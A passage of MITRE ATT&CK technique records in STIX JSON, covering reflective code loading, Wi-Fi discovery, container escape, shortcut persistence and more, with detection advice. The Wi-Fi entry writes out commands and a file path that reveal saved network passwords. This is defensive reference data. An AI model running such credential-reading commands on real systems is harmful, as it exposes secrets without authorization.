"x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Jo\u00e3o Paulo de A. Filho, @Hug1nN__", "Shlomi Salem, SentinelOne", "Lior Ribak, SentinelOne", "Rex Guo, @Xiaofei_REX, Confluera", "Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics", "Jiraput Thamsongkrah"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for code artifacts associated with reflectively loading code, such as the abuse of .NET functions such as Assembly.Load() and [Native API](https://attack.mitre.org/techniques/T1106) functions such as CreateThread(), memfd_create(), execve(), and/or execveat().(Citation: 00sec Droppers)(Citation: S1 Old Rat New Tricks)\n\nMonitor for artifacts of abnormal process execution. For example, a common signature related to reflective code loading on Windows is mechanisms related to the .NET Common Language Runtime (CLR) -- such as mscor.dll, mscoree.dll, and clr.dll -- loading into abnormal processes (such as notepad.exe). Similarly, AMSI / ETW traces can be used to identify signs of arbitrary code execution from within the memory of potentially compromised processes.(Citation: MDSec Detecting DOTNET)(Citation: Introducing Donut)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Linux", "Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Application control", "Anti-virus"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a", "created": "2021-10-05T01:15:06.293Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1620", "external_id": "T1620"}, {"source_name": "00sec Droppers", "description": "0x00pico. (2017, September 25). Super-Stealthy Droppers. Retrieved October 4, 2021.", "url": "https://0x00sec.org/t/super-stealthy-droppers/3715"}, {"source_name": "S1 Custom Shellcode Tool", "description": "Bunce, D. (2019, October 31). Building A Custom Tool For Shellcode Analysis. Retrieved October 4, 2021.", "url": "https://www.sentinelone.com/blog/building-a-custom-tool-for-shellcode-analysis/"}, {"source_name": "Mandiant BYOL", "description": "Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) \u2013 A Novel Red Teaming Technique. Retrieved October 4, 2021.", "url": "https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique"}, {"source_name": "S1 Old Rat New Tricks", "description": "Landry, J. (2016, April 21). Teaching an old RAT new tricks. Retrieved October 4, 2021.", "url": "https://www.sentinelone.com/blog/teaching-an-old-rat-new-tricks/"}, {"source_name": "MDSec Detecting DOTNET", "description": "MDSec Research. (n.d.). Detecting and Advancing In-Memory .NET Tradecraft. Retrieved October 4, 2021.", "url": "https://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/"}, {"source_name": "Microsoft AssemblyLoad", "description": "Microsoft. (n.d.). Assembly.Load Method. Retrieved February 9, 2024.", "url": "https://learn.microsoft.com/dotnet/api/system.reflection.assembly.load"}, {"source_name": "Intezer ACBackdoor", "description": "Sanmillan, I. (2019, November 18). ACBackdoor: Analysis of a New Multiplatform Backdoor. Retrieved October 4, 2021.", "url": "https://www.intezer.com/blog/research/acbackdoor-analysis-of-a-new-multiplatform-backdoor/"}, {"source_name": "Stuart ELF Memory", "description": "Stuart. (2018, March 31). In-Memory-Only ELF Execution (Without tmpfs). Retrieved October 4, 2021.", "url": "https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html"}, {"source_name": "Introducing Donut", "description": "The Wover. (2019, May 9). Donut - Injecting .NET Assemblies as Shellcode. Retrieved October 4, 2021.", "url": "https://thewover.github.io/Introducing-Donut/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-13T17:57:04.784Z", "name": "Data Destruction", "description": "Adversaries may perform data destruction over the course of an operation. The adversary may drop or create malware, tools, or other non-native files on a target system to accomplish this, potentially leaving behind traces of malicious activities. Such non-native files and other data may be removed over the course of an intrusion to maintain a small footprint or as a standard part of the post-intrusion cleanup process. (Citation: Enterprise ATT&CK January 2018)\n\nData destruction may also be used to render operator interfaces unable to respond and to disrupt response functions from occurring as expected. An adversary may also destroy data backups that are vital to recovery after an incident.\n\nStandard file deletion commands are available on most operating system and device interfaces to perform cleanup, but adversaries may use other tools as well. Two examples are Windows Sysinternals SDelete and Active@ Killdisk.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "inhibit-response-function"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Matan Dobrushin - Otorio"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["None"], "x_mitre_version": "1.0", "x_mitre_data_sources": ["File: File Modification", "Process: Process Creation", "File: File Deletion", "Command: Command Execution"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T0809", "external_id": "T0809"}, {"source_name": "Enterprise ATT&CK January 2018", "description": "Enterprise ATT&CK 2018, January 11 File Deletion Retrieved. 2018/05/17 ", "url": "https://attack.mitre.org/wiki/Technique/T1107"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-05T11:35:30.887Z", "name": "Wi-Fi Discovery", "description": "Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems. Adversaries may use Wi-Fi information as part of [Account Discovery](https://attack.mitre.org/techniques/T1087), [Remote System Discovery](https://attack.mitre.org/techniques/T1018), and other discovery or [Credential Access](https://attack.mitre.org/tactics/TA0006) activity to support both ongoing and future campaigns.\n\nAdversaries may collect various types of information about Wi-Fi networks from hosts. For example, on Windows names and passwords of all Wi-Fi networks a device has previously connected to may be available through `netsh wlan show profiles` to enumerate Wi-Fi names and then `netsh wlan show profile \u201cWi-Fi name\u201d key=clear` to show a Wi-Fi network\u2019s corresponding password.(Citation: BleepingComputer Agent Tesla steal wifi passwords)(Citation: Malware Bytes New AgentTesla variant steals WiFi credentials)(Citation: Check Point APT35 CharmPower January 2022) Additionally, names and other details of locally reachable Wi-Fi networks can be discovered using calls to `wlanAPI.dll` [Native API](https://attack.mitre.org/techniques/T1106) functions.(Citation: Binary Defense Emotes Wi-Fi Spreader)\n\nOn Linux, names and passwords of all Wi-Fi-networks a device has previously connected to may be available in files under ` /etc/NetworkManager/system-connections/`.(Citation: Wi-Fi Password of All Connected Networks in Windows/Linux) On macOS, the password of a known Wi-Fi may be identified with ` security find-generic-password -wa wifiname` (requires admin username/password).(Citation: Find Wi-Fi Password on Mac)\n", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Christopher Peacock", "Uriel Kosayev", "Liran Ravich, CardinalOps", "Alex Spivakovsky, Pentera"], "x_mitre_deprecated": false, "x_mitre_detection": "This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--494ab9f0-36e0-4b06-b10d-57285b040a06", "created": "2023-09-08T15:39:50.269Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1016/002", "external_id": "T1016.002"}, {"source_name": "Binary Defense Emotes Wi-Fi Spreader", "description": "Binary Defense. (n.d.). Emotet Evolves With new Wi-Fi Spreader. Retrieved September 8, 2023.", "url": "https://www.binarydefense.com/resources/blog/emotet-evolves-with-new-wi-fi-spreader/"}, {"source_name": "Check Point APT35 CharmPower January 2022", "description": "Check Point. (2022, January 11). APT35 exploits Log4j vulnerability to distribute new modular PowerShell toolkit. Retrieved January 24, 2022.", "url": "https://research.checkpoint.com/2022/apt35-exploits-log4j-vulnerability-to-distribute-new-modular-powershell-toolkit/"}, {"source_name": "Wi-Fi Password of All Connected Networks in Windows/Linux", "description": "Geeks for Geeks. (n.d.). Wi-Fi Password of All Connected Networks in Windows/Linux. Retrieved September 8, 2023.", "url": "https://www.geeksforgeeks.org/wi-fi-password-connected-networks-windowslinux/"}, {"source_name": "Malware Bytes New AgentTesla variant steals WiFi credentials", "description": "Hossein Jazi. (2020, April 16). New AgentTesla variant steals WiFi credentials. Retrieved September 8, 2023.", "url": "https://www.malwarebytes.com/blog/news/2020/04/new-agenttesla-variant-steals-wifi-credentials"}, {"source_name": "Find Wi-Fi Password on Mac", "description": "Ruslana Lishchuk. (2021, March 26). How to Find a Saved Wi-Fi Password on a Mac. Retrieved September 8, 2023.", "url": "https://mackeeper.com/blog/find-wi-fi-password-on-mac/"}, {"source_name": "BleepingComputer Agent Tesla steal wifi passwords", "description": "Sergiu Gatlan. (2020, April 16). Hackers steal WiFi passwords using upgraded Agent Tesla malware. Retrieved September 8, 2023.", "url": "https://www.bleepingcomputer.com/news/security/hackers-steal-wifi-passwords-using-upgraded-agent-tesla-malware/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-11-06T20:14:51.609Z", "name": "Ignore Process Interrupts", "description": "Adversaries may evade defensive mechanisms by executing commands that hide from process interrupt signals. Many operating systems use signals to deliver messages to control process behavior. Command interpreters often include specific commands/flags that ignore errors and other hangups, such as when the user of the active session logs off.(Citation: Linux Signal Man) These interrupt signals may also be used by defensive tools and/or analysts to pause or terminate specified running processes. \n\nAdversaries may invoke processes using `nohup`, [PowerShell](https://attack.mitre.org/techniques/T1059/001) `-ErrorAction SilentlyContinue`, or similar commands that may be immune to hangups.(Citation: nohup Linux Man)(Citation: Microsoft PowerShell SilentlyContinue) This may enable malicious commands and malware to continue execution through system events that would otherwise terminate its execution, such as users logging off or the termination of its C2 network connection.\n\nHiding from process interrupt signals may allow malware to continue execution, but unlike [Trap](https://attack.mitre.org/techniques/T1546/005) this does not establish [Persistence](https://attack.mitre.org/tactics/TA0003) since the process will not be re-invoked once actually terminated.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Viren Chaudhari, Qualys"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b", "created": "2023-08-24T17:23:34.470Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1564/011", "external_id": "T1564.011"}, {"source_name": "Linux Signal Man", "description": "Linux man-pages. (2023, April 3). signal(7). Retrieved August 30, 2023.", "url": "https://man7.org/linux/man-pages/man7/signal.7.html"}, {"source_name": "nohup Linux Man", "description": "Meyering, J. (n.d.). nohup(1). Retrieved August 30, 2023.", "url": "https://linux.die.net/man/1/nohup"}, {"source_name": "Microsoft PowerShell SilentlyContinue", "description": "Microsoft. (2023, March 2). $DebugPreference. Retrieved August 30, 2023.", "url": "https://learn.microsoft.com/powershell/module/microsoft.powershell.core/about/about_preference_variables?view=powershell-7.3#debugpreference"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-19T12:42:18.632Z", "name": "Escape to Host", "description": "Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)\n\nThere are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host\u2019s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask)\n\nAdditionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open)\n\nGaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, accessing other containers running on the host, or setting up a command and control channel on the host.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Yuval Avrahami, Palo Alto Networks", "Daniel Prizmant, Palo Alto Networks", "Alfredo Oliveira, Trend Micro", "David Fiser, @anu4is, Trend Micro", "Idan Frimark, Cisco", "Magno Logan, @magnologan, Trend Micro", "Ariel Shuper, Cisco", "Yossi Weizman, Azure Defender Research Team", "Vishwas Manral, McAfee", "CrowdStrike", "Eran Ayalon, Cybereason", "Oren Ofer, Cybereason", "Ilan Sokol, Cybereason", "Joas Antonio dos Santos, @C0d3Cr4zy"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for the deployment of suspicious or unknown container images and pods in your environment, particularly containers running as root. Additionally, monitor for unexpected usage of syscalls such as mount (as well as resulting process activity) that may indicate an attempt to escape from a privileged container to host. In Kubernetes, monitor for cluster-level events associated with changing containers' volume configurations.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "Containers"], "x_mitre_version": "1.5", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "User", "root"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--4a5b7ade-8bb5-4853-84ed-23f262002665", "created": "2021-03-30T17:38:34.277Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1611", "external_id": "T1611"}, {"source_name": "Container Escape", "description": "0xn3va. (n.d.). Escaping. Retrieved May 27, 2022.", "url": "https://0xn3va.gitbook.io/cheat-sheets/container/escaping"}, {"source_name": "Windows Server Containers Are Open", "description": "Daniel Prizmant. (2020, July 15). Windows Server Containers Are Open, and Here's How You Can Break Out. Retrieved October 1, 2021.", "url": "https://unit42.paloaltonetworks.com/windows-server-containers-vulnerabilities/"}, {"source_name": "Docker Overview", "description": "Docker. (n.d.). Docker Overview. Retrieved March 30, 2021.", "url": "https://docs.docker.com/get-started/overview/"}, {"source_name": "Docker Bind Mounts", "description": "Docker. (n.d.). Use Bind Mounts. Retrieved March 30, 2021.", "url": "https://docs.docker.com/storage/bind-mounts/"}, {"source_name": "Trend Micro Privileged Container", "description": "Fiser, D., Oliveira, A.. (2019, December 20). Why a Privileged Container in Docker is a Bad Idea. Retrieved March 30, 2021.", "url": "https://www.trendmicro.com/en_us/research/19/l/why-running-a-privileged-container-in-docker-is-a-bad-idea.html"}, {"source_name": "Intezer Doki July 20", "description": "Fishbein, N., Kajiloti, M.. (2020, July 28). Watch Your Containers: Doki Infecting Docker Servers in the Cloud. Retrieved March 30, 2021.", "url": "https://www.intezer.com/blog/cloud-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/"}, {"source_name": "Crowdstrike Kubernetes Container Escape", "description": "Manoj Ahuje. (2022, January 31). CVE-2022-0185: Kubernetes Container Escape Using Linux Kernel Exploit. Retrieved July 6, 2022.", "url": "https://www.crowdstrike.com/blog/cve-2022-0185-kubernetes-container-escape-using-linux-kernel-exploit/"}, {"source_name": "Keyctl-unmask", "description": "Mark Manning. (2020, July 23). Keyctl-unmask: \"Going Florida\" on The State Of Containerizing Linux Keyrings. Retrieved July 6, 2022.", "url": "https://www.antitree.com/2020/07/keyctl-unmask-going-florida-on-the-state-of-containerizing-linux-keyrings/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Shortcut Modification", "description": "Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.\n\nAdversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program.\n\nShortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://attack.mitre.org/techniques/T1176)) to persistently launch malware.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["David French, Elastic", "Bobby, Filar, Elastic", "Travis Smith, Tripwire"], "x_mitre_deprecated": false, "x_mitre_detection": "Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.\n\nMonitor for LNK files created with a Zone Identifier value greater than 1, which may indicate that the LNK file originated from outside of the network.(Citation: BSidesSLC 2020 - LNK Elastic)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.2", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["Administrator", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", "created": "2020-01-24T19:00:32.917Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1547/009", "external_id": "T1547.009"}, {"source_name": "Shortcut for Persistence ", "description": "Elastic. (n.d.). Shortcut File Written or Modified for Persistence. Retrieved June 1, 2022.", "url": "https://www.elastic.co/guide/en/security/7.17/shortcut-file-written-or-modified-for-persistence.html#shortcut-file-written-or-modified-for-persistence"}, {"source_name": "BSidesSLC 2020 - LNK Elastic", "description": "French, D., Filar, B.. (2020, March 21). A Chain Is No Stronger Than Its Weakest LNK. Retrieved November 30, 2020.", "url": "https://www.youtube.com/watch?v=nJ0UsyiUEqQ"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-31T14:00:00.188Z", "name": "Application Window Discovery", "description": "Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)\n\nAdversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_deprecated": false, "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["macOS", "Windows", "Linux"], "x_mitre_version": "1.3", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--4ae4f953-fe58-4cc8-a327-33257e30a830", "created": "2017-05-31T21:30:24.512Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1010", "external_id": "T1010"}, {"source_name": "ESET Grandoreiro April 2020", "description": "ESET. (2020, April 28). Grandoreiro: How engorged can an EXE get?. Retrieved November 13, 2020.", "url": "https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/"}, {"source_name": "Prevailion DarkWatchman 2021", "description": "Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022.", "url": "https://www.prevailion.com/darkwatchman-new-fileless-techniques/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Standard Cryptographic Protocol", "description": "Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels. (Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation. (Citation: SEI SSL Inspection Risks)\n\nIf malware uses encryption with symmetric keys, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures. (Citation: Fidelis DarkComet)\n\nIn general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", "created": "2017-05-31T21:30:35.334Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1032", "external_id": "T1032"}, {"source_name": "SANS Decrypting SSL", "description": "Butler, M. (2013, November). Finding Hidden Threats by Decrypting SSL. Retrieved April 5, 2016.", "url": "http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840"}, {"source_name": "SEI SSL Inspection Risks", "description": "Dormann, W. (2015, March 13). The Risks of SSL Inspection. Retrieved April 5, 2016.", "url": "https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html"}, {"source_name": "Fidelis DarkComet", "description": "Fidelis Cybersecurity. (2015, August 4). Looking at the Sky for a DarkComet. Retrieved April 5, 2016.", "url": "https://www.fidelissecurity.com/sites/default/files/FTA_1018_looking_at_the_sky_for_a_dark_comet.pdf"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Email Account", "description": "Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)\n\nIn on-premises Exchange and Exchange Online, theGet-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)\n\nIn Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "discovery"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Office 365", "Google Workspace"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--4bc31b94-045b-4752-8920-aebaebdb6470", "created": "2020-02-21T21:08:33.237Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1087/003", "external_id": "T1087.003"}, {"source_name": "Microsoft Exchange Address Lists", "description": "Microsoft. (2020, February 7). Address lists in Exchange Server. Retrieved March 26, 2020.", "url": "https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019"}, {"source_name": "Microsoft getglobaladdresslist", "description": "Microsoft. (n.d.). Get-GlobalAddressList. Retrieved October 6, 2019.", "url": "https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist"}, {"source_name": "Black Hills Attacking Exchange MailSniper, 2016", "description": "Bullock, B.. (2016, October 3). Attacking Exchange with MailSniper. Retrieved October 6, 2019.", "url": "https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/"}, {"source_name": "Google Workspace Global Access List", "description": "Google. (n.d.). Retrieved March 16, 2021.", "url": "https://support.google.com/a/answer/166870?hl=en"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Hypervisor", "description": "**This technique has been deprecated and should no longer be used.**\n\nA type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with [Rootkit](https://attack.mitre.org/techniques/T1014) functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": true, "x_mitre_detection": "Type-1 hypervisors may be detected by performing timing analysis. Hypervisors emulate certain CPU instructions that would normally be executed by the hardware. If an instruction takes orders of magnitude longer to execute than normal on a system that should not contain a hypervisor, one may be present. (Citation: virtualization.info 2006)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "2.0", "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--4be89c7c-ace6-4876-9377-c8d54cef3d63", "created": 